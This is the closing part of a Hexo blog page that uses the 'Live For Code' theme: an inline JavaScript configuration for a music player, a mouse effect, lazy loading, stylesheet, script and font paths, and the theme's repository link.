        Meting : {
            api      : "https://api.i-meto.com/meting/api",
            id       : "313150880", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css",
            waline           : "/css/waline.css",
            walineCustom     : "/css/waline-custom.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js",
            waline           : "/js/waline.mjs",
            pageview         : "/js/pageview.mjs",
            comment          : "/js/comment.mjs",
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>